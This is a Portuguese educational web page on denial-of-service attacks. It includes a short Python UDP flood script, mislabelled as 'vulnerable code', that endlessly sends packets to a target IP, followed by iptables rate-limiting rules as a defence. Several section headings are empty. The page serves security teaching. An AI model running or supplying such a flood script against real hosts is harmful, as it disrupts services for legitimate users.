NetGuard

Negação de Serviço (DoS)

O ataque de negação de serviço (DoS) tem como objetivo tornar um serviço ou recurso indisponível para seus usuários legítimos, sobrecarregando o sistema alvo com um grande volume de solicitações.

Riscos

Como os Hackers Executam o Ataque

Os hackers podem executar ataques de negação de serviço de várias maneiras, incluindo:

  1. Envio de um grande número de solicitações para sobrecarregar o servidor.
  2. Exploração de vulnerabilidades no software para consumir recursos excessivos.
  3. Uso de redes de bots (botnets) para realizar ataques distribuídos (DDoS).

Exemplo de Código Vulnerável

<!-- Exemplo de script de ataque DoS em Python -->
import socket

target_ip = "192.168.1.1"
target_port = 80

# Cria um socket UDP
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

message = b'A' * 1024 # Mensagem de 1024 bytes

while True:
    sock.sendto(message, (target_ip, target_port))

O exemplo acima mostra um script simples em Python que envia um grande número de pacotes UDP para o alvo, sobrecarregando o servidor.

Exemplo de Código Seguro

<!-- Exemplo de configuração de firewall para mitigar DoS -->
<!-- Usando iptables no Linux -->
# Limita o número de conexões por segundo
iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 20 -j REJECT

# Limita o número de novas conexões
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
iptables -A INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --seconds 60 --hitcount 20 -j DROP

O exemplo acima mostra como usar o iptables no Linux para limitar o número de conexões, ajudando a mitigar ataques DoS.

Boas Práticas

Más Práticas

Gostaria de testar seu conhecimento sobre o assunto

Clique aqui para iniciar o Quiz